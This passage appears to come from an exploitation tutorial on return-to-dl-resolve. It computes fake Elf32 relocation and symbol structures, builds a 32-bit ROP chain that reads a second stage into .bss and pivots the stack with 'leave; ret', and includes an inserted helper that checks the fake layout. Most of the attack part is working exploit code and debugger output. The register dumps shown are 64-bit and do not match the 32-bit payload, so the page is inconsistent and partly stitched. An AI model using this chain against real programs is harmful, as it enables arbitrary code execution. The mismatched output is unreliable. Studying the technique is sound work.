...

Code Block - FAKE reloc_arg, Fake Elf32_Rel, Fake Elf32_Sym (Python)
stack_size = 0x300
base_stage = addr_bss + stack_size

addr_fake_reloc  = base_stage + 20
addr_fake_sym    = addr_fake_reloc + 8
addr_fake_symstr = addr_fake_sym + 16
addr_fake_cmd    = addr_fake_symstr + 7

fake_reloc_offset = addr_fake_reloc - addr_relplt
fake_r_info       = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF   # FAKE ELF32_R_SYM
fake_r_info       = fake_r_info | 0x7                               # FAKE ELF32_R_TYPE
fake_st_name      = addr_fake_symstr - addr_dynstr
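Added example, not code from the original page: it packs the fake Elf32_Rel and Elf32_Sym that the snippet above computes and then decodes them the way the dynamic linker's _dl_fixup would, so the layout can be checked before any debugging. In particular the fake Elf32_Sym must lie at a multiple of 16 bytes from .dynsym, otherwise the symbol index encoded in r_info does not round-trip to the fake symbol. The section addresses are constructed assumptions, not the page's binary.

```python
import struct

# Constructed addresses for a non-PIE 32-bit ELF (assumptions made for this
# example, not the page's target binary).
addr_dynsym = 0x080481cc
addr_dynstr = 0x0804822c
addr_relplt = 0x08048298
addr_bss    = 0x0804a020

def build_fake_structs(base_stage):
    """Lay out fake Elf32_Rel, Elf32_Sym and name string as the page's snippet does."""
    addr_fake_reloc  = base_stage + 20
    addr_fake_sym    = addr_fake_reloc + 8
    addr_fake_symstr = addr_fake_sym + 16
    reloc_arg    = addr_fake_reloc - addr_relplt          # pushed before PLT0
    fake_r_info  = ((addr_fake_sym - addr_dynsym) * 16) & ~0xFF
    fake_r_info |= 0x7                                    # R_386_JMP_SLOT
    fake_st_name = addr_fake_symstr - addr_dynstr
    # Elf32_Rel = {r_offset, r_info}: the resolved address is written to
    # r_offset, so it has to be a writable location (here .bss itself).
    fake_reloc = struct.pack('<II', addr_bss, fake_r_info)
    # Elf32_Sym = {st_name, st_value, st_size, st_info, st_other, st_shndx};
    # st_other == 0 (STV_DEFAULT) is what makes _dl_fixup look the name up.
    fake_sym = struct.pack('<IIIBBH', fake_st_name, 0, 0, 0x12, 0, 0)
    return {'reloc_arg': reloc_arg, 'fake_reloc': fake_reloc,
            'fake_sym': fake_sym, 'addr_fake_sym': addr_fake_sym,
            'addr_fake_symstr': addr_fake_symstr}

def resolver_view(fake):
    """Decode the fake structures as _dl_fixup does: which sym and name get selected?"""
    _r_offset, r_info = struct.unpack('<II', fake['fake_reloc'])
    sym_index, r_type = r_info >> 8, r_info & 0xFF
    st_name = struct.unpack_from('<I', fake['fake_sym'])[0]
    return {'reloc_addr': addr_relplt + fake['reloc_arg'],
            'sym_addr': addr_dynsym + sym_index * 16,
            'name_addr': addr_dynstr + st_name, 'r_type': r_type}

def check_layout(base_stage):
    """List layout problems; empty means the resolver lands exactly on the fakes."""
    fake = build_fake_structs(base_stage)
    view = resolver_view(fake)
    problems = []
    if (fake['addr_fake_sym'] - addr_dynsym) % 16:
        problems.append('fake Elf32_Sym not 16-byte aligned relative to .dynsym')
    if view['sym_addr'] != fake['addr_fake_sym']:
        problems.append('decoded symbol index selects 0x%x' % view['sym_addr'])
    if view['name_addr'] != fake['addr_fake_symstr']:
        problems.append('st_name does not reach the fake name string')
    return problems
```

With these constructed addresses base_stage = addr_bss + 0x300 checks clean, while shifting base_stage by 4 bytes makes check_layout report the misaligned symbol.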

Move to ".bss" (Change the value of the esp register)

  • Using the vulnerability in the vuln() function, store the second ROP code in the ".bss" area, then write the following ROP code to move execution into the ".bss" area.
    • Using the "pop ebp; ret" gadget, store the base_stage value in the ebp register.
    • Using the "leave; ret" gadget, change the flow of the code from the Stack area to the ".bss" area.
      • The "leave;" instruction stores the value held in the ebp register into esp, and then the value at base_stage is stored in ebp.
      • The "ret;" instruction moves execution to the address stored at the location the esp register now points to (base_stage + 0x4).
Code Block - Move to ".bss" (Python)
#read(0,base_stage,100)
#jmp base_stage
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)
buf1 += p32(base_stage)
buf1 += p32(100)
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
Code Block
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x601440 ("AAAAAAAA\n\006@")
RSP: 0x7ffdc28c1b38 --> 0x7ffdc28c1b60 --> 0x1 
RIP: 0x400585 (<vuln+31>:	leave)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')

Code Block
RAX: 0x127 
RBX: 0x4141414141414141 ('AAAAAAAA')
RCX: 0x7fd67462e260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x190 
RSI: 0x601440 ("AAAAAAAA\n\006@")
RDI: 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x601448 --> 0x40060a (<__libc_csu_init+90>:	pop    rbx)
RIP: 0x400586 (<vuln+32>:	ret)
R8 : 0x400620 (<__libc_csu_fini>:	repz ret)
R9 : 0x7fd674911ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4141414141414141 ('AAAAAAAA')
R13: 0x4141414141414141 ('AAAAAAAA')
R14: 0x4141414141414141 ('AAAAAAAA')
R15: 0x4141414141414141 ('AAAAAAAA')


Return-to-dl-resolve

  • Store the Data in the ".bss" area as follows.

...